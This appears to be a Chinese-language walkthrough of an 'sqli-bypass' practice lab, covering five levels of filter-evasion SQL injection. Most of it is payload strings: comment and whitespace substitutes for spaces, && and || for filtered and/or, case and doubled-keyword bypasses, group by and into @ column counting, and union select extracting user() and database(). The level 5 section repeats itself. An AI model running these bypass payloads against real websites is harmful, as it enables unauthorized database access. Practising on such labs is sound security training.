sqli-bypass wp

sqli-bypass靶场

level 1

尝试注入点

1 ,1'1'',1",1""

==》存在字符型单引号注入

id=1'and(1)--+

==>提示存在sql注入

bypass

and()--+都可能存在被屏蔽掉

  • 尝试#代替--+

    id=1'and(1)%23

    ==》 正常回显,说明–+被屏蔽了,and,()没有屏蔽

  • 尝试空格

    id=1'+and(1)%23

    空格被绕过

  • 尝试%0a,%0b代替空格

    id=1'%0aand%0a(1)%23

    ==》正常回显,%0a没有被绕过。同理%0b/**/%09也没

  • 尝试order by

    id=1'/**/order/**/by/**/10%23

    ==》回显正常,二分法得到列数8

  • 尝试union select

    id=-1'/**/union/**/select/**/1,2,3,4,5,6,7,8%23

    ==>回显为4,5

  • 在回显位进行user,database爆破

    id=-1'/**/union/**/select/**/1,2,3,user(),database(),6,7,8%23

    成功爆破

    sqli-bypass wp_第1张图片

level 2

尝试注入点

1 ,1'1'',1",1""

==》存在字符型单引号注入

bypass

  • id=1'--+

    ==》回显正常,–、空格没有被屏蔽

  • id=1'+and+(1)--+

    ==> 回显异常,and或者()被过滤了

    • 尝试%26%26

      ==> 回显正常,and被过滤了,使用&&代替,()没有

    • 同理

      ==> or也被过滤了,使用||代替

  • 爆破列数:id=1'+order+by+10--+

    ==》order by 被过滤了

    • 尝试大小写绕过:id=1'+Order+by+10--+

      ==>回显正常,二分法获取列数8

  • 爆破回显位:id=-1'+union+select+1,2,3,4,5,6,7,8--+

    ==>回显正常,union select没有被屏蔽,得到回显位 4,5

  • 爆破字段:id=-1'+union+select+1,2,3,user(),database(),6,7,8--+

    ==>回显 正常,user,database关键字没有被屏蔽,爆破成功。

    sqli-bypass wp_第2张图片

level 3

尝试注入点

1 ,1'1'',1",1""

==》存在字符型单引号注入

bypass

  • 空格是否被屏蔽:id=1'--+

    ==>没有

  • and是否被屏蔽:id=1'+and+1--+

    ==》被屏蔽

    • 尝试%26%26id=1'+%26%26+1--+

      ==> 没有被屏蔽。用%26%26代替and

  • order by是否被屏蔽:id=1'+order+by+1--+

    ==> 没有。通过二分法,爆破列数为8

  • union select是否被屏蔽:id=-1'+union+select+1,2,3,4,5,6,7,8--+

    ==> 没有,爆破列数4,5

  • 爆破字段值:id=-1'+union+select+1,2,3,user(),database(),6,7,8--+

    ==>回显正常,同level2

level 4

尝试注入点

略,同level3,字符型单引号注入

bypass

  • 空格是否被过滤:同level3

    没有

  • and是否被过滤: 同level3

    同level3,使用%26%26代替and

  • order by是否被过滤

    ==>被过滤了

    • 测试order关键字是否被过滤:id=1'+/*order*/--+

      • 测试那个字符被过滤: id=1'+/*oarder*/--+id=1'+/*orader*/--+

        or字段被过滤了,by没有

      • 测试大小写绕过:id=1'+/*oRder*/--+

        被过滤

      • 测试双写绕过:id=1'+/*oorrder*/--+

        被过滤

  • 获取列数

    • order by因为or被过滤了,所有用不了,这里提供两种方式替代

      • group by绕过:`id=1’+group+by+10–+

        `

        sqli-bypass wp_第3张图片

        sqli-bypass wp_第4张图片

        ==> 爆破8列

      • into绕过:id=1'+into+@1,@2,@3,@4,@5,@6,@7,@8--+

        sqli-bypass wp_第5张图片

        sqli-bypass wp_第6张图片

        注:into的值要加@,@1,@2,@3...

        ==> 爆破8列

  • union select是否被屏蔽: 同level 3,没有

  • 爆破字段值:同level 3

level 5

尝试注入点

略,同level3,字符型单引号注入

bypass

  • 空格是否被过滤:同level3

    没有

  • and是否被过滤: 同level3

    同level3,使用%26%26代替and

  • order by是否被过滤

    ==>被过滤了,提示显示or字符别过滤了

    sqli-bypass wp_第7张图片

    • or之间增加or绕过:id=1'+oorrder+by+8--+

      ==>成功回显,爆破列数8

  • union select是否被屏蔽: 同level 3,没有

    爆破字段值:同level 3

  • order by是否被过滤

    ==>被过滤了,提示显示or字符别过滤了

    sqli-bypass wp_第8张图片

    • or之间增加or绕过:id=1'+oorrder+by+8--+

      ==>成功回显,爆破列数8

  • union select是否被屏蔽: 同level 3,没有

  • 爆破字段值:同level 3

你可能感兴趣的:(网络安全,数据库,sql,mysql)